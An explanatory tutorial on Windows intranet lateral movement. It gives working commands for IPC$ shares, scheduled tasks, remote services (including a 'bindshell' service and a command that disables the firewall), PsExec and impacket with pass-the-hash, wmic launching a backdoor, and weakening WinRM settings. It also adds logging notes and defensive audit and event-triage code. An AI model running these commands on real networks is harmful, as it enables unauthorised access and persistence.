
Title: Intranet penetration lateral movement techniques


In normal circumstances lateral movement begins once sufficient privileges have been obtained on a foothold. Most of the methods below also require high-privilege (administrator) credentials on the target.

https://www.freebuf.com/articles/network/251364.html

There are three situations for lateral movement on an intranet:

1. Lateral movement over a VPN into the network;

2. Lateral movement through a SOCKS proxy;

3. Lateral movement from a remote-access Trojan already running on an internal host;

File Transfer (Preparation)

The first thing to settle during lateral movement is the file transfer scheme, since attack payloads and other files will have to be deployed to each target later.

Network Sharing

On Windows, the network sharing function allows file sharing within a LAN: given valid user credentials, files can be copied from one machine to another over a share.

List the shares a Windows host exposes by default (the administrative shares ADMIN$, C$ and IPC$):

net share

In practice an IPC$ session is the usual starting point. It has two prerequisites:

1. IPC$ sharing (the Server service) is enabled on the remote host;

2. TCP port 139 or 445 on the remote host is reachable;

net use \\10.10.10.10\IPC$ "admin!@#456" /user:administrator

cmd.exe treats double quotes, not single quotes, as quoting characters; with single quotes they would become part of the password. With sufficient rights, dir and copy against \\10.10.10.10\c$ then work to inspect the target and move files.

Security considerations: net use, dir and copy run on the attacker's machine and start no process on the target, so they are relatively quiet. They are not invisible, though: the SMB session is authenticated by the target (a 4624 network logon, type 3) and, with file-share auditing enabled, each share access is written as event 5140, so the connection itself is still on record.

Build an SMB server

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%BC%80%E5%90%AFWindows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%8C%BF%E5%90%8D%E8%AE%BF%E9%97%AE%E5%85%B1%E4%BA%AB

SMB (Server Message Block), whose older dialect is known as CIFS (Common Internet File System), is an application-layer file sharing protocol. It runs over NetBIOS on TCP 139 or directly over TCP 445.

Standing up an SMB server that both the attacker and the victim can reach lets the victim host load a Trojan or other payload from a UNC path during intranet penetration, which is then used to control the target.

The difference between CIFS protocol and SMB protocol

**Using CIFS tickets:** If a compromised machine gives us a path such as constrained delegation or a silver ticket to a Kerberos service ticket for the domain controller's cifs/ SPN, impacket's psexec.py or smbexec.py can use that ticket directly with the `-k -no-pass` options, authenticating with the cached ticket instead of a password.

Note that with `-k -no-pass` impacket reads a Kerberos credential cache (.ccache, located through the KRB5CCNAME variable). Windows tools export tickets in .kirbi format, so a ticket obtained on Windows cannot be used as-is; it has to be converted first (impacket ships ticketConverter.py for this), which is why this flow is normally run from Linux.

With a valid CIFS service ticket for the domain controller, impacket (or a custom tool built on the same protocol) gives direct code execution on the domain controller.

Scheduled Tasks

Execution is the same over VPN and SOCKS. Administrator credentials for the target are normally required before a scheduled task can be created remotely.

After standing up an SMB server or establishing a share connection, copy the script to the target and create a scheduled task that runs it (loading a Trojan, adding a user and so on).

On targets older than Windows Server 2012, use at (removed in later versions):

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # Establish an IPC$ connection

copy add.bat \\192.168.3.21\c$ # Copy the file to run onto the target

at \\192.168.3.21 15:47 c:\add.bat # Schedule it for 15:47 (target local time)

On Windows Server 2012 and later, use schtasks:

net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # Establish an IPC$ connection

copy add.bat \\192.168.3.32\c$ # Copy the file to the target's C drive

schtasks /create /s 192.168.3.32 /ru SYSTEM /tn adduser /sc DAILY /tr c:\add.bat /F # Create a task named adduser that runs c:\add.bat

/s: the remote system to connect to;
/ru: the account the task runs as;
/tn: the name of the task;
/sc: the schedule type (MINUTE, HOURLY, DAILY, ONCE, ONSTART, ...);
/mo: the schedule modifier, e.g. every N minutes or hours;
/tr: the program the task runs;
/F: create the task even if one with that name already exists;

schtasks /query /s 10.10.10.10 /tn c # View the status of task c

schtasks /run /s 192.168.3.32 /tn adduser /i # Run the adduser task immediately

schtasks /delete /s 192.168.3.21 /tn adduser /f # Delete the adduser task


Note that the scheduled program runs in the background on the target and returns no output; redirect its output to a file and collect it over the share.

As with every remote connection, the logging depends on how the target is addressed: by IP address the client falls back to NTLM (Kerberos requires an SPN, and SPNs are registered for host names, not addresses), by host name or FQDN it uses Kerberos. The target records either as a 4624 network logon (type 3), and the AuthenticationPackageName field shows which one was used.


Creation, deletion and execution of the task are likewise recorded on the target host.


Microsoft-Windows-TaskScheduler/Operational records task creation, modification, deletion and execution. It is found in Event Viewer under Applications and Services Logs > Microsoft > Windows > TaskScheduler > Operational (event 106 task registered, 140 task updated, 141 task deleted, 100/200 task and action started, 102/201 completed). This log is disabled by default on server editions and has to be enabled to be of any use.

If "Audit Other Object Access Events" is enabled, the Security log additionally records 4698 (task created), 4699 (deleted), 4700/4701 (enabled/disabled) and 4702 (updated).

Microsoft-Windows-TaskScheduler/Maintenance, at the same location, covers the automatic maintenance tasks rather than the execution of arbitrary tasks.

Security considerations: although the task is created remotely, the Task Scheduler service starts a process on the target that runs the copied file, and both the registration and the execution leave records on the target, so this method is noisier than a plain share connection.

System Service

Execution is the same over VPN and SOCKS. A program or command can also be run on a remote host by creating a service on it.

This method requires administrative rights on the target host.

sc \\[Hostname/IP] create [servicename] binpath= "[path]" # Create a service that starts the program

sc \\10.10.10.10 create bindshell binpath= "c:\bind.exe"

Note the syntax: sc option names include the equals sign, so there must be a space after binpath= and none before it; otherwise the command fails.

Start the service

sc \\10.10.10.10 start bindshell

Delete the service

sc \\[Hostname/IP] delete [servicename] # Delete the service

A service can also be used to run an arbitrary command, for example to turn off the firewall:

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"

sc \\WIN-ENS2VR5TR3N start unablefirewall

netsh is not a service binary, so the start call reports error 1053 (the service did not respond in time), but the command has already executed by then.


Logging follows the same rule: NTLM authentication when the target is addressed by IP, Kerberos when by host name, recorded as a 4624 network logon on the target.


Service creation leaves its own trace as well: event 7045 in the System log (a service was installed) with the service name, image path and account, and event 4697 in the Security log if "Audit Security System Extension" is enabled.


Security considerations: creating a system service writes the service and its image path into the target's logs, so this method is noisier than a plain share connection.

PSEXEC

Execution is the same over VPN and SOCKS. Sysinternals PsExec (from PsTools) connects to the target's ADMIN$ share over SMB, writes a binary named PSEXESVC.exe there and registers a service named PSEXESVC. The service starts the requested program and relays its input and output over named pipes, so commands return their output; when the session ends the PSEXESVC service is removed again.

The conditions for running PsExec therefore are:

1. The target host has the ADMIN$ share enabled;

2. Port 139 or 445 is reachable for SMB;

3. The account used has the right to create services on the target (local administrator);

PsExec.exe -accepteula \\192.168.52.138 -u god\liukaifeng01 -p Liufupeng123 -i -s cmd.exe

-accepteula: suppresses the licence dialog that PsExec shows on first use.

-u: Username

-p: Password

-i: Run the program interactively on the target's console session.

-s: Run the remote process as SYSTEM and obtain an interactive SYSTEM shell. Without it, the shell runs with the rights of the account used to connect.

impacket's psexec.py does the same job from Python: it executes processes on remote Windows systems, copies files in and out (put/get inside its shell) and returns the output. It gives a fully interactive shell without installing any client software on the target.

python psexec.py [[domain/]username[:password]@][Target IP Address]

python psexec.py VVVV1/admins:[password]@[Target IP Address]

# Obtain an interactive shell as a domain user by passing the NT hash instead of a password

python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[username]@[Target IP Address]

The .py script and the compiled .exe release of it take the same arguments.


PsExec generates a logon event on the domain controller (for domain accounts) as well as on the target, and the target additionally records the installed service:

Event ID 7045 (System log: a service was installed)

With the official Sysinternals PsExec the service name is always PSEXESVC:


With impacket's psexec.py the service name and the name of the dropped binary are randomized on each run, which defeats a search for the string PSEXESVC but not the 7045 event itself.


Security analysis: psexec uploads a binary and creates a service, both of which the target logs, so it is noisier than a plain share connection.

WMI

Execution is the same over VPN and SOCKS. WMI (Windows Management Instrumentation) lets users manage local and remote computers; remotely it is carried over DCOM (Distributed Component Object Model) or WinRM (Windows Remote Management).

Conditions for running WMI remotely:

1. The WMI service (winmgmt) on the remote host is running;

2. TCP 135 (the RPC endpoint mapper) and the dynamic RPC port range used by DCOM are reachable on the remote host;

On Windows, wmic.exe and the PowerShell WMI/CIM cmdlets read WMI data and invoke WMI methods.

wmic /node:192.168.183.130 /user:administrator PATH win32_terminalservicesetting WHERE (__Class!='') CALL SetAllowTSConnections 1 # Enable Remote Desktop on the target (prompts for the password)

# wmic /node:"[full machine name]" /user:"[domain]\[username]" PATH win32_terminalservicesetting WHERE (__Class!='') CALL SetAllowTSConnections 1

Query remote process information

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process list brief

process call create returns only the new process ID and a return code, not the program's output, so redirect the output to a file and read it back over a share:

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create "cmd.exe /c ipconfig > C:\result.txt"

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create "cmd.exe /c [command] > C:\result.txt"

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create "[directory]\backdoor.exe"

/node: the host on which the command is run; /user and /password: the credentials for the DCOM connection

Authentication is logged as before: NTLM when the target is addressed by IP, Kerberos when by host name (a 4624 network logon on the target). Beyond that, wmic remote execution leaves nothing in the default logs. Only when process creation auditing (4688 with command-line logging) or Sysmon is in place does the executed command appear, and it then shows up as a child of WmiPrvSE.exe.


DCOM Utilization

Execution is the same over VPN and SOCKS; see https://www.freebuf.com/articles/web/293280.html

WinRM utilization

Execution is the same over VPN and SOCKS. Reference: http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_4124.html

WinRM is Microsoft's implementation of the WS-Management protocol: it lets Windows computers on the same network manage each other and exchange information. It listens on TCP 5985 (HTTP) and 5986 (HTTPS).

From Windows Server 2012 onward the WinRM service and its HTTP listener are enabled by default; on older servers they have to be configured by hand. Moving laterally over WinRM requires administrator credentials for the remote host.

Enable the WinRM service

1. Check whether a WinRM listener exists

winrm e winrm/config/listener

An error means no listener is configured.

2. Enable the service and create a listener

Run this from an elevated cmd.exe. winrm is a .cmd script, and in PowerShell the @{...} arguments below would be parsed as PowerShell hashtables and mangled.

winrm quickconfig

Answer "y" to both prompts.

3. Allow Basic authentication on the service

winrm set winrm/config/service/auth @{Basic="true"}

4. Allow unencrypted (plain HTTP) traffic; without this, a Basic-auth connection over HTTP is refused

winrm set winrm/config/service @{AllowUnencrypted="true"}

Steps 3 and 4 are the weak configuration: with both set, the base64-encoded username and password and every command cross the network in clear text. They are only needed when the client cannot use Kerberos or Negotiate; a defender should keep both at false.

5. Review the WinRM configuration

winrm get winrm/config

Configure TrustedHosts (client side; needed when authenticating with NTLM or Basic to a host that cannot be verified through Kerberos)

winrm set winrm/config/client @{TrustedHosts="10.10.10.10"} # Trust the host 10.10.10.10

Set-Item WSMan:\localhost\Client\TrustedHosts -Value * # PowerShell: trust every host (the client will then send credentials to any name it is given)
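The configuration steps above are exactly what a defender does not want to find on a host, so here is the corresponding check: an added Python example, not code from the original article or from any Microsoft tool, that parses the output of `winrm get winrm/config` from step 5 and reports each loosened setting alongside the winrm command that restores the default. The configuration dump it runs on is a constructed sample in the tool's indented `Key = value` layout, not output captured from a real host; on a real host, save the output of `winrm get winrm/config` to a file and feed that in.

```python
"""Audit the text printed by `winrm get winrm/config` for the settings the
procedure above loosens (Basic auth, unencrypted transport, TrustedHosts=*)
and pair each one with the command that reverts it. WINRM_CONFIG_SAMPLE is a
constructed dump in the real tool's indented `Key = value` layout."""

WINRM_CONFIG_SAMPLE = """\
Config
    MaxEnvelopeSizekb = 500
    MaxTimeoutms = 60000
    Client
        NetworkDelayms = 5000
        AllowUnencrypted = false
        Auth
            Basic = true
            Kerberos = true
            Negotiate = true
        DefaultPorts
            HTTP = 5985
            HTTPS = 5986
        TrustedHosts = *
    Service
        MaxConcurrentOperationsPerUser = 1500
        AllowUnencrypted = true
        Auth
            Basic = true
            Kerberos = true
            Negotiate = true
            Certificate = false
            CredSSP = false
        DefaultPorts
            HTTP = 5985
            HTTPS = 5986
        IPv4Filter = *
        IPv6Filter = *
        AllowRemoteAccess = true
    Winrs
        AllowRemoteShellAccess = true
        MaxShellsPerUser = 30
"""

# (setting path, weak value, why it matters, command that restores the default)
CHECKS = [
    ("Service/AllowUnencrypted", "true",
     "command output and Basic credentials cross the wire in clear over HTTP",
     'winrm set winrm/config/service @{AllowUnencrypted="false"}'),
    ("Service/Auth/Basic", "true",
     "base64 username:password is accepted, with no mutual authentication",
     'winrm set winrm/config/service/auth @{Basic="false"}'),
    ("Service/Auth/CredSSP", "true",
     "clients delegate their full credentials to this host",
     'winrm set winrm/config/service/auth @{CredSSP="false"}'),
    ("Client/TrustedHosts", "*",
     "this client will send NTLM or Basic credentials to any host name, including a spoofed one",
     'winrm set winrm/config/client @{TrustedHosts=""}'),
]


def parse_winrm_config(text):
    """Build nested dicts from the indentation: a line without ' = ' opens a
    section, a line with it sets a value in the innermost open section."""
    root = {}
    stack = [(-1, root)]  # (indent width, dict of that section)
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        while indent <= stack[-1][0]:  # close sections that are not deeper
            stack.pop()
        section = stack[-1][1]
        key, sep, value = raw.strip().partition(" = ")
        if sep:
            section[key] = value
        else:
            section[key] = {}
            stack.append((indent, section[key]))
    return root


def lookup(cfg, path):
    """Return the string value at Config/<path>, or None if absent/a section."""
    node = cfg.get("Config", {})
    for part in path.split("/"):
        if not isinstance(node, dict):
            return None
        node = node.get(part)
    return node if isinstance(node, str) else None


def audit_winrm_config(cfg):
    """Return (path, observed value, reason, fix command) per weak setting."""
    findings = []
    for path, weak, why, fix in CHECKS:
        observed = lookup(cfg, path)
        if observed is not None and observed.lower() == weak:
            findings.append((path, observed, why, fix))
    return findings


if __name__ == "__main__":
    for path, value, why, fix in audit_winrm_config(parse_winrm_config(WINRM_CONFIG_SAMPLE)):
        print(f"{path} = {value}: {why}\n    fix: {fix}")
```

An empty value in the real output (for example a blank TrustedHosts) prints as a bare key with no `=`; the parser stores it as an empty section and `lookup` reports it as absent, so it is not flagged.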

Command execution

winrs -r:http://10.10.10.10:5985 -u:Administrator -p:admin!@#456 whoami

winrs -r:http://10.10.10.10:5985 -u:Administrator -p:admin!@#456 cmd

The first form runs a single command and returns its output; the second gives an interactive remote cmd session.


Authentication is logged as before: NTLM when the target is addressed by IP, Kerberos when by host name (a 4624 network logon on the target). WinRM also has its own log, Microsoft-Windows-WinRM/Operational, which records sessions and shell creation, and the executed command runs as a child of winrshost.exe (winrs) or wsmprovhost.exe (PowerShell remoting), so it appears under process creation auditing; without that auditing the commands themselves are not recorded.
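The logging notes above for share access, scheduled tasks, services, PsExec, WMI and WinRM can be turned into triage logic. The following Python is an added example, not code from the article or from any product. The events it runs over are constructed samples in a flat dict form using the Windows event schema field names (EventID, LogonType, AuthenticationPackageName, ShareName, ServiceName, ImagePath, TaskName, TaskContent, ParentProcessName, ...), not exported logs; the NTLM/Kerberos hint repeats the page's by-IP versus by-name rule, and the "8 random letters" pattern used to spot an impacket psexec.py service is a heuristic about its default naming, not a documented guarantee.

```python
"""Triage of the host-side traces this page attributes to each technique:
share access, scheduled tasks, services, PsExec, WMI and WinRM.
SAMPLE_EVENTS are constructed records (not exported logs) whose field
names follow the Windows event schema."""
import re
from collections import Counter

ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}

# Parent processes that mark a remote-execution channel on the target.
REMOTE_EXEC_PARENTS = {
    "wmiprvse.exe": "WMI (wmic process call create / wmiexec.py)",
    "winrshost.exe": "WinRM (winrs)",
    "wsmprovhost.exe": "WinRM (PowerShell remoting)",
    "psexesvc.exe": "Sysinternals PsExec",
}

SAMPLE_EVENTS = [
    # net use \\target\IPC$ by IP address: NTLM network logon
    {"Log": "Security", "EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "administrator", "IpAddress": "10.10.10.5"},
    # the same operator addressing the target by host name: Kerberos
    {"Log": "Security", "EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "administrator", "IpAddress": "10.10.10.5"},
    # copy to ADMIN$ (only logged when file-share auditing is on)
    {"Log": "Security", "EventID": 5140, "ShareName": "\\\\*\\ADMIN$",
     "SubjectUserName": "administrator", "IpAddress": "10.10.10.5"},
    # Sysinternals PsExec: fixed service and binary name
    {"Log": "System", "EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    # impacket psexec.py: random 8-letter service name, random binary in the ADMIN$ root
    {"Log": "System", "EventID": 7045, "ServiceName": "bQKkDlxZ",
     "ImagePath": "%systemroot%\\sYHpHeZu.exe", "AccountName": "LocalSystem"},
    # sc create unablefirewall binpath= "netsh ...": a command, not a service binary
    {"Log": "System", "EventID": 7045, "ServiceName": "unablefirewall",
     "ImagePath": "netsh advfirewall set allprofiles state off", "AccountName": "LocalSystem"},
    # schtasks /create /s target /tn adduser /tr c:\add.bat (needs Other Object Access auditing)
    {"Log": "Security", "EventID": 4698, "TaskName": "\\adduser", "SubjectUserName": "administrator",
     "TaskContent": "<Actions><Exec><Command>c:\\add.bat</Command></Exec></Actions>"},
    # wmic process call create: child of WmiPrvSE.exe (needs process creation auditing)
    {"Log": "Security", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c ipconfig > C:\\result.txt"},
    # winrs ... cmd: child of winrshost.exe
    {"Log": "Security", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\winrshost.exe", "CommandLine": "cmd"},
    # an ordinary vendor service install, for contrast
    {"Log": "System", "EventID": 7045, "ServiceName": "VendorUpdater",
     "ImagePath": "\"C:\\Program Files\\Vendor\\updater.exe\" /svc", "AccountName": "LocalSystem"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def looks_like_impacket_service(name, image_path):
    """Heuristic: 8 random ASCII letters for both the service name and the
    dropped binary, with the binary sitting in the ADMIN$ (%SystemRoot%) root."""
    if name.upper() == "PSEXESVC":
        return False
    random_name = re.fullmatch(r"[A-Za-z]{8}", name) is not None
    dropped = re.fullmatch(r"%systemroot%\\[A-Za-z]{8}\.exe", image_path, re.I) is not None
    return random_name and dropped


def triage(event):
    """Return (severity, reason) findings for one event; empty when benign."""
    findings = []
    eid = event.get("EventID")
    if eid == 4624 and event.get("LogonType") == 3:
        pkg = event.get("AuthenticationPackageName", "?")
        hint = ("NTLM: target addressed by IP, or a local account" if pkg == "NTLM"
                else "Kerberos: target addressed by host name")
        findings.append(("info", f"network logon for {event.get('TargetUserName')} "
                                 f"from {event.get('IpAddress')} ({hint})"))
    elif eid == 5140:
        share = event.get("ShareName", "").rsplit("\\", 1)[-1].upper()
        if share in ADMIN_SHARES:
            findings.append(("medium", f"administrative share {share} opened from {event.get('IpAddress')}"))
    elif eid == 7045:
        name, path = event.get("ServiceName", ""), event.get("ImagePath", "")
        if name.upper() == "PSEXESVC":
            findings.append(("high", "Sysinternals PsExec service installed"))
        elif looks_like_impacket_service(name, path):
            findings.append(("high", f"PsExec-style service {name} with dropped binary {path}"))
        if not re.search(r"\.(exe|sys)\b", path, re.I):
            # sc create ... binpath= "netsh ...": ImagePath is a command line, not a service binary
            findings.append(("high", f"service {name} created with a non-service command line: {path}"))
    elif eid == 4698:
        m = re.search(r"<Command>(.*?)</Command>", event.get("TaskContent", ""))
        findings.append(("medium", f"scheduled task {event.get('TaskName')} created by "
                                   f"{event.get('SubjectUserName')} to run {m.group(1) if m else '?'}"))
    elif eid == 4688:
        parent = _basename(event.get("ParentProcessName", ""))
        if parent in REMOTE_EXEC_PARENTS:
            findings.append(("high", f"{_basename(event.get('NewProcessName', ''))} spawned by {parent}: "
                                     f"{REMOTE_EXEC_PARENTS[parent]}; cmdline: {event.get('CommandLine')}"))
    return findings


def triage_all(events):
    """Flatten findings over a list of events."""
    return [{"EventID": ev.get("EventID"), "severity": sev, "reason": reason}
            for ev in events for sev, reason in triage(ev)]


def severity_counts(events):
    return Counter(f["severity"] for f in triage_all(events))


if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"[{f['severity']:<6}] {f['EventID']}: {f['reason']}")
```

The 4624 line is deliberately only informational: the same network logon is produced by every technique on this page, and it is the pairing with a 7045, 4698 or a 4688 whose parent is WmiPrvSE.exe or winrshost.exe that separates lateral movement from routine administration.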


Linux performs horizontal penetration

Lateral movement from Linux generally relies on the Impacket toolkit, a collection of Python scripts.

wmiexec.py

Execution is the same over VPN and SOCKS. wmiexec.py obtains a semi-interactive shell through Windows Management Instrumentation, running as the (administrator) account supplied. No service or agent is installed on the target and no binary is dropped, which makes it considerably quieter than psexec.py.

python wmiexec.py [[domain/]username[:password]@][Target IP Address]

python wmiexec.py VVVV1/admins:[password]@[Target IP Address] (Note: if the password contains a shell metacharacter such as !, escape it with a backslash or single-quote the whole argument)

python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[username]@[Target IP Address]
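The credential syntax shared by psexec.py (under PSEXEC above) and wmiexec.py, the `[[domain/]username[:password]@]target` form and the `-hashes LMHASH:NTHASH` option, is easy to get wrong when a password carries `@` or `:`. The following is an added Python re-implementation of that parser for illustration; it is not impacket's own code. Two details are this example's choices rather than documented impacket behaviour: it splits on the last `@` so that a password containing `@` survives, and it fills an omitted LM hash with the well-known LM hash of the empty password.

```python
"""Parse the [[domain/]username[:password]@]target credential string and the
-hashes LMHASH:NTHASH option used by impacket's psexec.py and wmiexec.py.
Illustrative re-implementation, not impacket's parser (see the lead-in for
the two behaviours that are this example's own choices)."""
import re
from dataclasses import dataclass

HASH_RE = re.compile(r"[0-9a-fA-F]{32}")
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password


@dataclass
class Target:
    domain: str
    username: str
    password: str
    host: str
    lmhash: str = ""
    nthash: str = ""

    def pass_the_hash(self):
        """True when authentication will use an NT hash rather than a password."""
        return bool(self.nthash)


def parse_target(spec):
    """[[domain/]username[:password]@]host -> Target (no hashes yet).

    Splitting on the LAST '@' is this example's choice: it keeps a password
    such as P@ss intact; with no '@' at all the whole string is the host."""
    cred, _, host = spec.rpartition("@")
    if not host:
        raise ValueError("missing target host in %r" % spec)
    domain, _, userpass = cred.rpartition("/")
    username, _, password = userpass.partition(":")  # first ':' ends the user name
    return Target(domain, username, password, host)


def apply_hashes(target, hashes):
    """-hashes LMHASH:NTHASH; a leading ':' means the LM half is omitted."""
    lm, sep, nt = hashes.partition(":")
    if not sep:
        raise ValueError("expected LMHASH:NTHASH, got %r" % hashes)
    lm = lm or EMPTY_LM  # substitution for an omitted LM hash (this example's choice)
    for h in (lm, nt):
        if not HASH_RE.fullmatch(h):
            raise ValueError("not a 32-hex-digit hash: %r" % h)
    target.lmhash, target.nthash = lm.lower(), nt.lower()
    target.password = ""  # the hash replaces any password given in the target string
    return target


def describe(target):
    """One-line summary of how the connection will authenticate."""
    who = f"{target.domain}\\{target.username}" if target.domain else target.username
    how = f"NT hash {target.nthash[:8]}..." if target.pass_the_hash() else "password"
    return f"{who} -> {target.host} via {how}"


if __name__ == "__main__":
    print(describe(parse_target("god/administrator:P@ss:w0rd@10.10.10.10")))
    print(describe(apply_hashes(parse_target("god/administrator@10.10.10.10"),
                                ":ccef208c6485269c20db2cad21734fe7")))
```

The `./user` form from the wmiexec.py example above simply yields `.` as the domain, which NTLM treats as the local machine.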


A logon event is recorded on the domain controller (and on the target), but the attacker's own machine behind the SOCKS tunnel does not appear in it: the source address in the logon event is that of the pivot host.


psexec.py

Execution is the same over VPN and SOCKS. psexec.py takes the same arguments and leaves the same traces as described under PSEXEC above: a logon event on the domain controller and on the target, plus event 7045 for the service it installs (with a randomized service name).

